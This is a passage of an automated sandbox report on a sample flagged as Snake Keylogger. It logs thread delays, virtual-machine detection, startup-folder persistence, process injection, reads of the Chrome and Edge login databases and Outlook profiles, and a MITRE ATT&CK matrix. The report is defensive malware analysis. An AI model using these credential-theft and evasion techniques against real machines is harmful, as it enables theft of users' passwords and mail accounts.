                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598844Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598734Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598624Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598515Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598406Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598297Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598187Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598078Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597968Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597859Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597749Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597640Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597531Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597422Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597297Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 597153Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 596779Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 596637Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 596531Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 596422Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 596312Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 596203Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 596093Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595984Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595875Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595765Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595656Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595547Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595437Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595328Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595218Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595109Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 595000Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594890Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594781Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594672Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594561Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594453Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594343Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594230Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 594089Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 593967Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 593859Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99853Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99749Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99625Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99427Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99303Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99137Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99015Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98905Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98797Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98687Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98578Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98467Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98357Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98234Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98125Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98015Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97906Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97796Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97687Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97578Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97468Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97359Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97250Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97140Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97031Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96921Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96812Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96506Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96375Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96265Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599812Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599702Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599593Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599484Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599373Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599265Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599155Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599047Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598937Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598828Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598718Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598609Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598499Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598390Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598281Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598171Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598062Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597953Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597843Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597734Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597623Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597515Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597405Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597253Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596984Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596874Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596547Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596437Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596328Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596218Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596109Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595890Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595781Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595671Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595453Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595342Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595234Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595124Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595002Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594875Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594547Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594437Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594328Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.0000000001645000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
                      Source: ishon.exe, 00000005.00000002.2504335246.000000000326E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: ishon.exe, 00000005.00000002.2504335246.000000000326E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3313003733.0000000001277000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3313643471.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeMemory written: C:\Users\user\Desktop\LAQfpnQvPQ.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMemory written: C:\Users\user\AppData\Roaming\ishon.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess created: C:\Users\user\Desktop\LAQfpnQvPQ.exe "C:\Users\user\Desktop\LAQfpnQvPQ.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeQueries volume information: C:\Users\user\Desktop\LAQfpnQvPQ.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeQueries volume information: C:\Users\user\Desktop\LAQfpnQvPQ.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Users\user\AppData\Roaming\ishon.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Users\user\AppData\Roaming\ishon.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Snake Keylogger
                      Source: Yara matchFile source: 7.2.ishon.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3315771924.0000000003159000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3312269079.000000000041A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3315771924.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3315124818.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LAQfpnQvPQ.exe PID: 6364, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 6184, type: MEMORYSTR
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\ishon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LAQfpnQvPQ.exe PID: 6364, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 6184, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Snake Keylogger
                      Source: Yara matchFile source: 7.2.ishon.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3315771924.0000000003159000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3312269079.000000000041A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3315771924.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3315124818.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LAQfpnQvPQ.exe PID: 6364, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 6184, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting                      		Valid Accounts1
                      Scheduled Task/Job                      		111
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		2
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading                      		111
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory13
                      System Information Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		2
                      Obfuscated Files or Information                      		Security Account Manager1
                      Query Registry                      		SMB/Windows Admin Shares1
                      Email Collection                      		2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron2
                      Registry Run Keys / Startup Folder                      		2
                      Registry Run Keys / Startup Folder                      		1
                      Software Packing                      		NTDS21
                      Security Software Discovery                      		Distributed Component Object ModelInput Capture13
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Process Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials31
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
